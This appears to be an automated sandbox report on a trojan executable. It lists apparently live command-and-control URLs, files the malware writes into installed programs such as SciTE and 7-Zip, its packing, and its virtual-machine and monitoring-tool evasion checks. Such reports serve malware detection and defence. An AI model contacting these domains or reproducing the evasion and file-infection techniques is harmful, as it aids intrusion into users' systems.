      Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337504737.0000000001EFD000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342559578.0000000001EFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strainriskpropos.store/apii9
      Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337504737.0000000001EEB000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342368005.0000000001EF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strainriskpropos.store:443/api7
      Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337936959.0000000001F12000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342700657.0000000001F15000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1338255788.0000000001F14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telephoneverdictyow.site/
      Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337936959.0000000001F12000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342700657.0000000001F15000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1338255788.0000000001F14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telephoneverdictyow.site/7
      Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337936959.0000000001F12000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342700657.0000000001F15000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1338255788.0000000001F14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telephoneverdictyow.site/8
      Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337936959.0000000001F12000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342700657.0000000001F15000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1338255788.0000000001F14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://theoryapparatusjuko.fun/
      Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337936959.0000000001F12000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342700657.0000000001F15000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1338255788.0000000001F14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://theoryapparatusjuko.fun/api
      Source: SciTE.exe.2.drString found in binary or memory: https://www.smartsharesystems.com/
      Source: SciTE.exe.2.drString found in binary or memory: https://www.smartsharesystems.com/Morten
      Source: SciTE.exe.2.drBinary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \memstr_52582d98-f

      System Summary

      barindex
      Source: Lisect_AVT_24003_G1A_70.exeStatic PE information: section name:
      Source: Lisect_AVT_24003_G1A_70.exeStatic PE information: section name:
      Source: Lisect_AVT_24003_G1A_70.exeStatic PE information: section name:
      Source: Lisect_AVT_24003_G1A_70.exeStatic PE information: section name:
      Source: Lisect_AVT_24003_G1A_70.exeStatic PE information: section name:
      Source: Lisect_AVT_24003_G1A_70.exeStatic PE information: section name: ;Mu
      Source: MyProg.exe.2.drStatic PE information: section name: Y|uR
      Source: oHOvZLBf.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeCode function: 2_2_00DF60762_2_00DF6076
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeCode function: 2_2_00DF6D002_2_00DF6D00
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe 4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7520 -s 1528
      Source: MyProg.exe.2.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
      Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1339219519.0000000000F52000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameCubase5.exeF vs Lisect_AVT_24003_G1A_70.exe
      Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000000.1288403069.0000000001131000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameCubase5.exeF vs Lisect_AVT_24003_G1A_70.exe
      Source: Lisect_AVT_24003_G1A_70.exeBinary or memory string: OriginalFilenameCubase5.exeF vs Lisect_AVT_24003_G1A_70.exe
      Source: Lisect_AVT_24003_G1A_70.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: oHOvZLBf.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: oHOvZLBf.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: oHOvZLBf.exe.0.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
      Source: Lisect_AVT_24003_G1A_70.exeStatic PE information: Section: ZLIB complexity 0.9938739825885656
      Source: Lisect_AVT_24003_G1A_70.exeStatic PE information: Section: ZLIB complexity 1.0038910505836576
      Source: Lisect_AVT_24003_G1A_70.exeStatic PE information: Section: ZLIB complexity 0.998429693076374
      Source: Lisect_AVT_24003_G1A_70.exeStatic PE information: Section: ZLIB complexity 0.9976855624735144
      Source: classification engineClassification label: mal100.spre.troj.evad.winEXE@7/15@8/1
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeCode function: 2_2_00DF119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,2_2_00DF119F
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\k1[1].rarJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7520
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exeFile created: C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exeJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: Lisect_AVT_24003_G1A_70.exeVirustotal: Detection: 86%
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exeFile read: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe "C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe"
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exeProcess created: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7520 -s 1528
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exeProcess created: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exeJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exeSection loaded: webio.dllJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeSection loaded: ntvdm64.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeSection loaded: ntvdm64.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeSection loaded: ntvdm64.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeAutomated click: OK
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeAutomated click: OK
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: Lisect_AVT_24003_G1A_70.exeStatic file information: File size 6279680 > 1048576
      Source: Lisect_AVT_24003_G1A_70.exeStatic PE information: Raw size of .boot is bigger than: 0x100000 < 0x4d3ab2
      Source: Lisect_AVT_24003_G1A_70.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

      Data Obfuscation

      barindex
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeUnpacked PE file: 2.2.oHOvZLBf.exe.df0000.1.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
      Source: initial sampleStatic PE information: section where entry point is pointing to: ;Mu
      Source: Lisect_AVT_24003_G1A_70.exeStatic PE information: section name:
      Source: Lisect_AVT_24003_G1A_70.exeStatic PE information: section name:
      Source: Lisect_AVT_24003_G1A_70.exeStatic PE information: section name:
      Source: Lisect_AVT_24003_G1A_70.exeStatic PE information: section name:
      Source: Lisect_AVT_24003_G1A_70.exeStatic PE information: section name:
      Source: Lisect_AVT_24003_G1A_70.exeStatic PE information: section name: .imports
      Source: Lisect_AVT_24003_G1A_70.exeStatic PE information: section name: .themida
      Source: Lisect_AVT_24003_G1A_70.exeStatic PE information: section name: .boot
      Source: Lisect_AVT_24003_G1A_70.exeStatic PE information: section name: ;Mu
      Source: oHOvZLBf.exe.0.drStatic PE information: section name: .aspack
      Source: oHOvZLBf.exe.0.drStatic PE information: section name: .adata
      Source: SciTE.exe.2.drStatic PE information: section name: u
      Source: Uninstall.exe.2.drStatic PE information: section name: EpNuZ
      Source: MyProg.exe.2.drStatic PE information: section name: PELIB
      Source: MyProg.exe.2.drStatic PE information: section name: Y|uR
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeCode function: 2_2_00DF1638 push dword ptr [00DF3084h]; ret 2_2_00DF170E
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeCode function: 2_2_00DF2D9B push ecx; ret 2_2_00DF2DAB
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeCode function: 2_2_00DF6014 push 00DF14E1h; ret 2_2_00DF6425
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeCode function: 2_2_00DF600A push ebp; ret 2_2_00DF600D
      Source: Lisect_AVT_24003_G1A_70.exeStatic PE information: section name: entropy: 7.961868081494972
      Source: Lisect_AVT_24003_G1A_70.exeStatic PE information: section name: ;Mu entropy: 6.935039632025298
      Source: oHOvZLBf.exe.0.drStatic PE information: section name: .text entropy: 7.81169422100848
      Source: SciTE.exe.2.drStatic PE information: section name: u entropy: 6.933628777130411
      Source: Uninstall.exe.2.drStatic PE information: section name: EpNuZ entropy: 6.934522898773344
      Source: MyProg.exe.2.drStatic PE information: section name: Y|uR entropy: 6.934569393442332

      Persistence and Installation Behavior

      barindex
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exeFile created: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeFile created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file

      Boot Survival

      barindex
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exeWindow searched: window name: FilemonClassJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exeWindow searched: window name: RegmonClassJump to behavior

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 799
      Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 799
      Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 799
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exeSystem information queried: FirmwareTableInformationJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_2-936
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe TID: 7712Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeCode function: 2_2_00DF1718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00DF1754h2_2_00DF1718
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeCode function: 2_2_00DF29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,2_2_00DF29E2
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeCode function: 2_2_00DF2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,2_2_00DF2B8C
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
